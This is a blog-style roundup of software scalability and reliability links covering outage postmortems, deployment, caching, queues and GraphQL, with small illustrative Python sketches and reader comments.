  • You may not agree with everything but the reasoning should prove instructive. My biggest lesson, at least on Thursdays, is software is a team sport. What's yours? Things I Learnt The Hard Way (in 30 Years of Software Development): Spec first, then code; Write steps as comments; Gherkin (test description format) is your friend to understand expectations; Unit tests are good, integration tests are gooder; Tests make better APIs; Be ready to throw your code away; Solve the problem you have right now; Documentation is a love letter to your future self; The function documentation is its contract; If a function description includes an "and", it's wrong; Types say what your data is; If your data has a schema, use a structure to keep it; "Right tool for the job" is just to push an agenda; Data flows beat patterns, and many more. Good discussion on HackerNews.

  • I like to think of the effort to operate a distributed system being similar to operating a large organization, like a hospital. Practices found useful at Uber to reliably operate a large system: Monitoring; Oncall, Anomaly Detection & Alerting; Outages & Incident Management Processes; Postmortems, Incident Reviews & a Culture of Ongoing Improvements; Failover Drills, Capacity Planning & Blackbox Testing; SLOs, SLAs & Reporting on Them; SRE as an Independent Team; Reliability as an Ongoing Investment; Further Recommended Reading. Mitigation now, investigation tomorrow. The most common failure scenario I have observed is services not having enough resources in a new data center to handle global traffic. When a company grows to the point where reliability work across teams takes up more than a few engineers' time, it's time to put a dedicated team for this in place. 

  • Advice from Amazon, UPS, and Home Depot on How to prevent a Prime Day crash. Prepare for double or triple the traffic you expect. Begin preparations months in advance. Make sure your system is as dynamically scalable as possible. Be strategically multi-regional: divvy up the onslaught of traffic by where in the country/world it’s coming from. Lock down your applications ahead of peak month to avoid any last-minute changes causing problems. Stress test. Leverage traffic data from past years to predict future results. 

  • Videos from React Europe are now available

  • Since a regular expression processor is basically an embedded interpreter and interpreters in embedded systems are very dangerous because of their lack of predictability, REs should probably not be used in production. A pattern you didn't test could blow up at any time. Details of the Cloudflare outage on July 2, 2019: Unfortunately, last Tuesday’s update contained a regular expression that backtracked enormously and exhausted CPU used for HTTP/HTTPS serving. This brought down Cloudflare’s core proxying, CDN and WAF functionality. 
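    • To make "backtracked enormously" concrete, here is a minimal sketch, not Cloudflare's code. It hand-simulates how a backtracking engine would try the fragment `.*.*=` (two greedy wildcards followed by a literal) and counts how often it tests for the literal. The fragment and the function name `count_attempts` are illustrative assumptions. On input with no `=` in it, the work grows quadratically with input length.

```python
def count_attempts(text: str) -> int:
    """Simulate a backtracking match of the pattern .*.*= anchored at the start of text.

    Returns how many times the engine checks for the literal '=' before it
    either finds a match or runs out of ways to split the input.
    """
    n = len(text)
    attempts = 0
    # The first .* is greedy: it tries n characters, then n-1, ... down to 0.
    for first in range(n, -1, -1):
        # The second .* is greedy over whatever the first one left behind.
        for second in range(n - first, -1, -1):
            pos = first + second
            attempts += 1
            if pos < n and text[pos] == "=":
                return attempts  # literal matched, the engine stops here
    return attempts  # every split failed: (n + 1) * (n + 2) / 2 attempts


if __name__ == "__main__":
    for n in (10, 20, 40):
        # Doubling the input roughly quadruples the work.
        print(n, count_attempts("x" * n))
```

      Each extra wildcard in front of the literal adds another nested loop, which is why an untested pattern can look fine on short inputs and still exhaust CPU on long ones.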

  • If you are a small government in Florida this won't help. Secure Cloud Architecture - Towards a Smart City cloud privacy, Security, and Rights-Inclusive Architecture. Start with a 3 level classification scheme. Red: sensitive data, including personally identifiable information, so the most controlled and restricted. Yellow: medium sensitivity information whose access may be controlled but which by law can be shared more widely, although still with controls and monitoring. Green: low sensitivity data which can be shared openly, such as smart city civic and open data. After that, not much of practical use.

  • Python, Java, and JavaScript are the top three most in-demand languages, says Coding Dojo. My decision to go with Perl over Python all those years ago is not aging well. Of course ReactJS is the top framework. MySQL and Redis tie for the top database. So while it seems everything is changing it appears not that much has changed.

  • Videos from Gophercon SG 2019 are now available

  • The Microsoft Security Response Center says it is considering replacing C and C++ with Rust. The idea is to stop piling tooling on top of insecure languages and just use a secure language to start with. We will see. 

  • The combination of deployless and feature flags means that about 60% of the deployment pipeline is no longer necessary. How Dark deploys code in 50ms.
    • The first and most important decision was to make Dark “deployless” (thanks to Jessie Frazelle for coining the term). Deployless means that anything you type is instantly deployed and immediately usable in production. 
    • Dark runs interpreters in the cloud. When you write new code in a function or HTTP/event handler, we send a diff of the Abstract Syntax Tree (the representation of your code that our editor and servers use under the hood) to our servers, and then we run that code when requests come in. So deployment is just a small write to a database, which is instant and atomic. 
    • Our deploys are so fast because we trimmed a deploy to the smallest thing possible. One way to reduce accidental complexity in Dark is by solving many different problems with a single solution. Feature flags is our workhorse: replacing local dev environments, git branches, code deployment, and of course still providing the traditional use-case of slow, controlled roll-out of new code. 
    • pbigger: The model is quite different to how people write code today. Instead of a process that takes code from your machine and sends it to prod (and thus has a lot of risk), you code in a sorta sandbox _in prod_. That is then enabled for users via changing the feature flag setting
    • pbigger: We run the infrastructure in the cloud (we run it on GCP using Postgres and k8s, but will likely go multicloud at some point). Most of the advantages we discuss in this post come from the fact that you're using the Dark editor, language and infra. I don't believe this would be possible with a self-hosted solution.
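    • A toy model of the idea described above, where "deploying" is a small write and a feature flag decides what users see. This is a sketch under assumptions, not Dark's implementation: `ToyPlatform`, its methods, and the in-memory dictionaries standing in for a database are all hypothetical.

```python
from typing import Callable, Dict, Optional

Handler = Callable[[str], str]


class ToyPlatform:
    """Saving code is a dictionary write; a flag picks the version users get."""

    def __init__(self) -> None:
        self.versions: Dict[str, Dict[str, Handler]] = {}  # route -> version -> handler
        self.flags: Dict[str, str] = {}                    # route -> version served to users

    def save(self, route: str, version: str, handler: Handler) -> None:
        # Saved code is runnable right away, but is not exposed to users yet.
        self.versions.setdefault(route, {})[version] = handler
        self.flags.setdefault(route, version)  # the first saved version is the default

    def set_flag(self, route: str, version: str) -> None:
        # Flipping the flag is the "release": one small write.
        if version not in self.versions.get(route, {}):
            raise KeyError(f"unknown version {version!r} for route {route!r}")
        self.flags[route] = version

    def handle(self, route: str, request: str, preview: Optional[str] = None) -> str:
        # A developer can preview a specific version; everyone else gets the flagged one.
        version = preview or self.flags[route]
        return self.versions[route][version](request)


if __name__ == "__main__":
    platform = ToyPlatform()
    platform.save("/hello", "v1", lambda name: "hello " + name)
    platform.save("/hello", "v2", lambda name: "hi " + name)
    print(platform.handle("/hello", "bob"))                # users still see v1
    print(platform.handle("/hello", "bob", preview="v2"))  # developer previews v2 in prod
    platform.set_flag("/hello", "v2")
    print(platform.handle("/hello", "bob"))                # now everyone sees v2
```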

  • This is why we can't maintain nice things. OpenFaaS Creator on Open Source’s Community-Funding Model. Is the reason companies won't pay the maintainers of the open source software they use and profit from because they see it as charity? Whatever the reason corporate support for open source has proven to be a failed model. 

  • You probably don't have enough fault isolation. Stripe's Root cause analysis: significantly elevated error rates on 2019‑07‑10: we implemented additional monitoring to alert us when nodes stop reporting replication lag; We are also introducing several changes to prevent failures of individual shards from cascading across large fractions of API traffic. This includes additional circuit-breaking on failed operations to particular clusters, including the one implicated in these events. We will also pursue additional fault isolation techniques to contain the impact of a single failed shard and limit resource consumption by clients attempting repeated retries of failed requests; we will introduce further procedures and tooling to increase the safety with which operators can make rapid configuration changes during incident response.
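    • For readers who haven't met circuit breaking, here is a minimal sketch of the general pattern, not Stripe's implementation. The class name, thresholds, and the injectable `clock` are assumptions chosen for illustration. After a few consecutive failures the breaker rejects calls immediately for a cool-down period, which keeps retries from piling onto a shard that is already struggling.

```python
import time
from typing import Callable, Optional, TypeVar

T = TypeVar("T")


class CircuitOpenError(Exception):
    """Raised when a call is rejected without reaching the backend."""


class CircuitBreaker:
    def __init__(self, max_failures: int = 3, reset_after: float = 30.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.max_failures = max_failures
        self.reset_after = reset_after
        self.clock = clock
        self.failures = 0
        self.opened_at: Optional[float] = None  # None means the circuit is closed

    def call(self, operation: Callable[[], T]) -> T:
        if self.opened_at is not None:
            if self.clock() - self.opened_at < self.reset_after:
                raise CircuitOpenError("failing fast: backend was recently unhealthy")
            # Cool-down elapsed: allow a trial call; one more failure reopens the circuit.
            self.opened_at = None
            self.failures = self.max_failures - 1
        try:
            result = operation()
        except Exception:
            self.failures += 1
            if self.failures >= self.max_failures:
                self.opened_at = self.clock()
            raise
        self.failures = 0  # any success closes the circuit fully
        return result
```

      One breaker per shard or cluster (for example a dictionary keyed by shard name) is what contains the blast radius: a failing shard trips only its own breaker.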

  • Are you checking whether your certificates are about to expire? Technical Details on the Recent Firefox Add-on Outage.

  • The usual page after page detailing why OOP sucks and the equally usual paragraph saying functional programming is the answer without any proof but the toe curling idealism of the converted. Object-Oriented Programming — The Trillion Dollar Disaster. Yes, OOP has been used poorly. But it has been used. Why might that be? Are programmers so irrational and full of self-hatred that they would maintain a multi-decade long conspiracy against FP? That must be it. 

  • Newton missed data gravity, but it's a real force. If you are considering moving a lot of data to the cloud then don't miss this experience report. Migrating 6.5TB of FileStream Data to AWS S3 - A Journey Concluded. It's quite the heroic tale. 
    • A lesson is to create a service interface from the beginning so data is written through one API. That would have made finding all write paths into the database much easier.
    • Versioning is also on. One of the biggest draw cards of S3 over any other service was knowing that user actions like delete or overwrite could be protected against.
    • Main savings were cost and reliability. Yes, S3 can go down, we know that. But there was always a FAR greater chance this server we ran would go down, far higher than S3 going down. It had had 6+ outages in the 6 months during this cutover alone! :)

  • It has been said most recent mobile services are about replacing all the jobs a mom typically performed. I wonder what this means?  The Ideal Startup Toolstack to Scale Your Growth: Slack, Intercom, Chargebee, HubSpot, Zendesk, ProductBoard, Gitlab, Elium, Zoom, Zapier, Google Suite, Stripe, Chartmogul, Spendesk, Apollo, Wisepop, Pixelme, Squarespace, Lempod, Quuu, Smartrecruiters, Bamboo HR, CRM HubSpot, Intercom, Planhat, Mixpanel, Marvel, Sketch.

  • Client side caching in Redis 6. Client libraries are usually fairly dumb, but they can do a lot iff you are willing to move complexity into the client. Here's a clever approach Redis is adopting to create a caching layer in the client. Many clients have a lot of memory. Why not use it? For some irony, Fast key-value stores: An idea whose time has come and gone argues for client side caching of data because it gets rid of marshaling overhead and network latency. They quote a 40% improvement in 99.9th-percentile latency. Though I seem to remember OO databases of the past faulting objects into memory, and they didn't make it.
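    • The general shape of client side caching with server-driven invalidation can be sketched in a few lines. This is a toy in-process model, not the Redis protocol or any client library's API: `ToyServer` and `CachingClient` are hypothetical names, and a real system would deliver invalidations over the network.

```python
from typing import Dict, Optional, Set


class ToyServer:
    """Stand-in for the data store; remembers which clients have read each key."""

    def __init__(self) -> None:
        self.data: Dict[str, str] = {}
        self.readers: Dict[str, Set["CachingClient"]] = {}

    def get(self, key: str, client: "CachingClient") -> Optional[str]:
        self.readers.setdefault(key, set()).add(client)  # track who may cache this key
        return self.data.get(key)

    def set(self, key: str, value: str) -> None:
        self.data[key] = value
        # Tell every client that may hold a stale copy to drop it.
        for client in self.readers.pop(key, set()):
            client.invalidate(key)


class CachingClient:
    def __init__(self, server: ToyServer) -> None:
        self.server = server
        self.local: Dict[str, Optional[str]] = {}
        self.round_trips = 0

    def get(self, key: str) -> Optional[str]:
        if key in self.local:
            return self.local[key]  # served from client memory, no round trip
        self.round_trips += 1
        value = self.server.get(key, self)
        self.local[key] = value
        return value

    def invalidate(self, key: str) -> None:
        self.local.pop(key, None)


if __name__ == "__main__":
    server = ToyServer()
    server.set("user:1", "ann")
    client = CachingClient(server)
    client.get("user:1")
    client.get("user:1")           # second read is a local hit
    server.set("user:1", "bob")    # write invalidates the client's copy
    print(client.get("user:1"), client.round_trips)
```

      The cost of the approach is visible even in the toy: the server has to remember who read what, which is the complexity the post is about managing.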

  • Kubernetes Co-Founders On K8s’ Past, Present and Future (It Ain’t All Pretty). Why did the engineering community evolve around k8s instead of docker? Is the utility being driven by vertical integration or driven by modularity? Since k8s is an intrinsically more modular system, it allowed every vendor to see some way to create unique value. As a result k8s became a natural aggregation point for the community to rally around. Docker, by contrast, was much more focused on vertical integration and a closed system experience, so it just wasn't that interesting to other vendors that wanted to bring resources. 

  • You should tend to prefer mature things, and you should try not to use too many things.  Choose Boring Technology: "Then one day I said, “hey, I wonder how activity feeds is doing.” And I looked at it and was surprised to discover that in the time since we’d launched it, the usage had increased by a factor of 20. And as far as I could tell it was totally fine. The fact that 2,000% more people could be using activity feeds and we didn’t even have any idea that it was happening is certainly the greatest purely technical achievement of my career. The reason it was possible was because we used the shared stack. There were people around whose job involved noticing that we needed more MySQL’s or cron boxes or whatever. And there were other people who had to go to the datacenter and plug in new machines. But they were doing that horizontal scaling because the site was growing holistically. Nobody doing this had any awareness of our lone feature." Of course what is boring is a moving target. My guess is that if you want a technology badly enough you can make a reasonable argument as to why it's boring.

  • Really all objects are algorithms and all algorithms are objects. Two sides of the same coin. Algorithms as objects

  • Wouldn't it be wonderful if the tools we use to build the web were as accessible as spreadsheets are? Rich Harris - Rethinking reactivity. Brilliant. Never thought of spreadsheets as reactive programs. What matters is the functionality, not where the functionality happens. The only reliable way to improve performance is to get rid of code.

  • The Tortoise and the Hare. The LSAT reminds me of software interviews and the lack of relationship between schools, grades, and interview performance to success at the job. For some reason we'd rather haze people instead of train people.

  • Checklists have been part of code reviews for 30 years. The Simple Genius of Checklists, from B-17 to the Apollo Missions. euler_angles: I have been a flight test and rocket test engineer. Checklists were life, especially in the rocket world. The fantastic thing about checklists is that they both keep you accountable and free your mental resources so that when something happens that one of your checklists doesn't cover, you know you've at least tried all the sane/expected things. I personally found that backstop freeing and allowed me to use my creativity when it was demanded by things going wrong.

  • Everything old is new again. Using AWK and R to parse 25tb. scottlocklin: You can solve many, perhaps most terascale problems on a standard computer with big enough hard drives using the old memory efficient tools like sed, awk, tr, od, cut, sort & etc. A9's recommendation engine used to be a pile of shell scripts on log files that ran on someone's desktop...

  • Comparing the Same Project in Rust, Haskell, C++, Python, Scala and OCaml: I think my overall takeaway is that design decisions make a much larger difference than the language, but the language matters insofar as it gives you the tools to implement different designs.

  • Did you know there's an entire conference on GraphQL? GraphQL Conf 2019 in a nutshell - Some Takeaways. Several videos are available. 

  • Jonathan Sumption argues against Britain adopting a written constitution as a response to political alienation. 5/5. Shifting the Foundations. A thought provoking series of podcasts. In computing we tend to like systems based on a system of laws. We love security based constraint solvers because we can prove a system secure. These lectures make the case that judges and the legal system are not the place for making policy; that's the realm of a political process where we debate issues and make decisions. The big problem is that in the US our democracy relies upon the political process to counter partisanship, which sounds good in theory (people working out their problems together), but in practice the political process algorithm has not proved a sufficient immune system to sustain a democracy against the constant stream of forces subverting it for their own ends. In response, in the US we’ve tried giving more power to the legal system in the hopes it might be enough to save democracy, but that strategy is essentially conservative. It’s not adaptive. A legalistic system cannot rise to meet the problems of the present or the challenges of the future. I think this is relevant in the future because of AI. AI will no doubt play a larger governing role in our future. The problem is any AI mediated system will certainly be legalistic. That may not be what we want, but that may be what we deserve.

  • It's not on-prem. It's not IaaS. It's something new. What is an AWS Outpost Rack? This is what you'll see inside an AWS datacenter and is the product of 12 years of development. It's 24" wide, 48" deep, and 80" tall. It has casters so it can be rolled into position. You plug in power and networking and automation takes over. There's a bus bar in the back and power shelf in the middle. Individual servers do not have their own power supplies. The outpost rack uses a centralized redundant power conversion unit and DC distribution unit in the backplane. Dual switches are included. Every active component is redundant and can be pulled and replaced without interrupting service. You'll be notified of any detected failure and how to replace a unit. Bringing new capacity online is completely automated. Switches are 100 gig capable, supporting four 100 gig connections. You can use 10 gig optics. Racks can be linked together. Nitro cards are in every server. The only difference between this rack and one used in EC2 is that it includes an additional Nitro chip in every server to connect it back to the public region. Outpost brings AWS to wherever you need it. 

  • Video Upload Latency Improvements at Instagram: A simple improvement to reduce video upload latency is to only do the minimal work necessary before a video is considered publishable; We represent our video data model with a graph-based storage system. All video versions are attached to a “video asset” parent node, which allows us to reason about the video at the uploaded media level instead of the video version level. This abstraction enables simple and unified publishing logic; Another performance optimization we use to improve the upload latency and save CPU utilization is something we call a “passthrough” upload. In some cases, the media that is uploaded is already ready for playback on most devices. If so, we can skip the video processing altogether and store the video directly into our data model.
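    • The two ideas (publish after minimal work, and skip processing entirely for "passthrough" uploads) amount to a small decision function. The sketch below is illustrative only: the `Upload` fields, the step names, and the playability criteria are hypothetical, since the post does not give Instagram's actual rules.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Upload:
    codec: str
    container: str
    height: int


# Hypothetical "already playable on most devices" criteria (not from the source).
PLAYABLE_CODECS = {"h264"}
PLAYABLE_CONTAINERS = {"mp4"}
MAX_HEIGHT = 1080


def can_passthrough(upload: Upload) -> bool:
    """True when the uploaded file could be served as-is."""
    return (upload.codec in PLAYABLE_CODECS
            and upload.container in PLAYABLE_CONTAINERS
            and upload.height <= MAX_HEIGHT)


def plan_steps(upload: Upload) -> List[str]:
    """Order the work so that publishing happens as early as possible."""
    if can_passthrough(upload):
        # Passthrough: no processing before publish.
        return ["store_original", "publish"]
    # Otherwise do the minimum needed to publish, and the rest afterwards.
    return ["transcode_one_playable_version", "publish", "transcode_remaining_versions"]


if __name__ == "__main__":
    print(plan_steps(Upload("h264", "mp4", 720)))
    print(plan_steps(Upload("hevc", "mov", 2160)))
```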

  • You are not alone. Kubernetes Failure Stories

  • 309 – Forensic Engineering. The big difference in building structures is that there are standards, requirements, materials, standard load calculations, an understanding of forces, doubling rules for safety factors, and an understanding of failure modes. Most software is still made out of custom everything. Perhaps as cloud services become more standard, software can become a little more like structural engineering.

  • Rebuilding Message Search at Slack. Search is different at Slack. It's not like the web because every user has their own unique document set they have access to. It's not like email because there is a lot of commonality within teams. Messages quickly lose relevance over time. Not a lot of head queries, which means queries are unique so caching doesn't help a lot. 100x write to read ratio. The old system used Solr and assigned teams to fixed shards forever, so large teams could blow out a shard. It had to scale vertically and it cost a lot. Performance wasn't great. Changing the index would require refeeding the entire message flow, which would take months. The new system uses SolrCloud because that was the easiest migration and they didn't see a big win with any other system. They built an offline indexing map-reduce like pipeline using snapshots from the MySQL database. Backups of MySQL are copied to S3 and the map-reduce pipeline is kicked off, which produces Solr shards which are uploaded into the system. This is done every week. 

  • Using Rust to Scale Elixir for 11 Million Concurrent Users. While using a safe language like Elixir has advantages, it makes doing some simple things difficult—like creating a large, heavily updated, in-memory list: "The double-edged sword of immutable data structures is that mutations are modeled by taking an existing data structure and an operation and creating a brand new data structure that is the result of applying that operation to the existing data structure." After many workarounds, they went with another safe language: "The Rust backed NIF provides massive performance benefits without trading off ease of use or memory. Since the library operations all clocked in well under the 1 millisecond threshold, we could just use the built-in Rustler guarantees and not need to worry about reductions or yielding. The SortedSet module looks to the caller to just be a vanilla Elixir module that performs crazy fast."

  • A thorough explanation of event sourcing. Online Event Processing. May the log be with you. 

  • I had a most negative visceral reaction to reading this. Who doesn't love queues? But the discussion is a good one. @rbranson: "Queues are bad, but software developers love them. You'd think they would magically fix any overload or failure problem. But they don't, and bring with them a bunch of their own problems. First off, queues turn your system into a liar. Convert something to an async operation and your system will always return a success response. But there's no guarantee that the request will actually ever be processed successfully." Tim Bray wrote a response in On SQS: "While there are good queues, I agree with his sentiment. If you can build a straightforward monolithic app and never think about all this asynchronous crap, go for it! If your system is big enough that you need to refactor into microservices for sanity’s sake, but you can get away with synchronous call chains, you definitely should." Good discussion on HackerNews.

  • This is My Architecture has a lot of great videos from various companies.

  • Scaling to 1 million active GraphQL subscriptions (live queries): Implementing live-queries is painful. Once you have a database query that has all the authorization rules, it might be possible to incrementally compute the result of the query as events happen. But this is practically challenging to do at the web-service layer. For databases like Postgres, it is equivalent to the hard problem of keeping a materialized view up to date as underlying tables change. An alternative approach is to refetch all the data for a particular query (with the appropriate authorization rules for the specific client). This is the approach we currently take. Secondly, building a webserver to handle websockets in a scalable way is also sometimes a little hairy, but certain frameworks and languages do make the concurrent programming required a little more tractable...After these experiments, we’ve currently fallen back to interval based polling to refetch queries. So instead of refetching when there is an appropriate event, we refetch the query based on a time interval. 
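
The interval-based refetch described in the last item can be sketched roughly as follows. This is a minimal illustration, not the authors' implementation: the `PolledLiveQuery` class and its `fetch` and `push` callbacks are hypothetical names, and the sketch assumes query results are JSON-serializable so they can be compared by digest.

```python
import hashlib
import json
from typing import Callable, Optional


class PolledLiveQuery:
    """Refetch a query each polling cycle and push only changed results."""

    def __init__(self, fetch: Callable[[], object], push: Callable[[object], None]):
        # Hypothetical callbacks: `fetch` runs the full query with the
        # client's authorization rules; `push` sends the payload to the client.
        self.fetch = fetch
        self.push = push
        self._last_digest: Optional[str] = None

    def tick(self) -> bool:
        """Run one polling cycle; return True if a new result was pushed."""
        result = self.fetch()
        # Compare a digest of the serialized result instead of keeping
        # the previous result set in memory.
        digest = hashlib.sha256(
            json.dumps(result, sort_keys=True).encode("utf-8")
        ).hexdigest()
        if digest == self._last_digest:
            return False  # nothing changed since the last refetch
        self._last_digest = digest
        self.push(result)
        return True
```

A scheduler would call `tick()` once per interval for each subscription. The trade-off is visible in the code: every cycle pays for a full refetch whether or not anything changed, in exchange for not having to map database events back to affected queries.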

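On the queue discussion above, one common mitigation for "queues turn your system into a liar" is to bound the queue and reject work when it is full, so overload surfaces to the caller. The sketch below is an assumption-laden illustration, not something taken from either post: `BoundedIntake`, `submit`, and `drain_one` are hypothetical names built on Python's standard `queue` module.

```python
import queue
from typing import Any, Optional


class BoundedIntake:
    """Accept jobs only while there is room; otherwise tell the caller no."""

    def __init__(self, max_pending: int):
        # A bounded queue makes overload visible instead of hiding it.
        self._q: "queue.Queue[Any]" = queue.Queue(maxsize=max_pending)

    def submit(self, job: Any) -> bool:
        """Return True if the job was queued, False if the queue is full."""
        try:
            self._q.put_nowait(job)
            return True
        except queue.Full:
            return False  # caller can retry, shed load, or report an error

    def drain_one(self) -> Optional[Any]:
        """Remove and return the oldest queued job, or None if empty."""
        try:
            return self._q.get_nowait()
        except queue.Empty:
            return None
```

Note that a `True` from `submit` still only means the job was queued, not that it will be processed successfully, which is exactly the gap the original quote complains about.
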
Soft Stuff:

  • andygrove/ballista: Ballista is a proof-of-concept distributed compute platform based on Kubernetes and the Rust implementation of Apache Arrow.
  • cuelang/cue: CUE is an open source data constraint language which aims to simplify tasks involving defining and using data. You can use CUE to: define a detailed validation schema for your data (manually or automatically from data); reduce boilerplate in your data (manually or automatically from schema); extract a schema from code; generate type definitions and validation code; merge JSON in a principled way; define and run declarative scripts.
  • uber-research/plato-research-dialogue-system: The Plato Research Dialogue System is a flexible framework that can be used to create, train, and evaluate conversational AI agents in various environments. It supports interactions through speech, text, or dialogue acts and each conversational agent can interact with data, human users, or other conversational agents (in a multi-agent setting). 

Pub Stuff: 

  • Migrating to GraphQL: A Practical Assessment: As our key result, we show that GraphQL can reduce the size of the JSON documents returned by REST APIs in 94% (in number of fields) and in 99% (in number of bytes), both median results.
  • Nines are Not Enough: Meaningful Metrics for Clouds: We also suggest that defining guarantees in terms of defense against threats, rather than guarantees for application-visible outcomes, can reduce the complexity of these problems. Overall, we offer a partial framework for thinking about Service Level Objectives (SLOs), and discuss some unsolved challenges.
  • THE DAWN OF ROBOT SURVEILLANCE: Today’s capture-and-store video systems are starting to be augmented with active monitoring technology known variously as “video analytics,” “intelligent video analytics,” or “video content analysis.” The goal of this technology is to allow computers not just to record but also to understand the objects and actions that a camera is capturing. This can be used to alert the authorities when something or someone deemed “suspicious” is detected, or to collect detailed information about video subjects for security or marketing purposes.
  • Towards Multiverse Databases: The central idea behind multiverse databases is to push the data access and privacy rules into the database itself. The database takes on responsibility for authorization and transformation, and the application retains responsibility only for authentication and correct delegation of the authenticated principal on a database call. Such a design rules out an entire class of application errors, protecting private data from accidentally leaking.
  • Google's AI papers at CVPR 2019
  • Scaling Time Series Motif Discovery with GPUs: Breaking the Quintillion Pairwise Comparisons a Day Barrier: In this work we show that with several novel insights we can push the motif discovery envelope using a novel scalable framework in conjunction with a deployment to commercial GPU clusters in the cloud. We demonstrate the utility of our ideas with detailed case studies in seismology, demonstrating that the efficiency of our algorithm allows us to exhaustively consider datasets that are currently only approximately searchable, allowing us to find subtle precursor earthquakes that had previously escaped attention, and other novel seismic regularities.

Reader Comments (9)

Welcome back!

July 19, 2019 | Unregistered CommenterJoel Williams

Wow! You have no idea how much I missed this blog.

July 19, 2019 | Unregistered CommenterCoco

Wow, that's a yuuuggee post. Thank you! Will make the weekend busy!

July 20, 2019 | Unregistered CommenterFan

Damn, I've missed this series!

July 22, 2019 | Unregistered Commenterjoonas.fi

Freeman (Dyson) is misspelled as Freemon.

July 22, 2019 | Unregistered CommenterDude

Thanks for posting!! Loves a lot of the content this time..... always learn something useful.

July 23, 2019 | Unregistered CommenterPhil Mattson

Since i have started using NCache distributed caching, i dont feel any scaling issues.

July 23, 2019 | Unregistered CommenterAyesha Irshad

Interesting. any reason behind no https on the site.

July 24, 2019 | Unregistered CommenterKris

Yes, there's a hard redirect in Squarespace's web server back to http so there's a loop when I use Cloudflare to add https. Squarespace doesn't support HTTPS on V5. I'd have to move to a mobile version. After much trial and effort and no cooperation from SS I've given up.

July 25, 2019 | Registered CommenterTodd Hoff
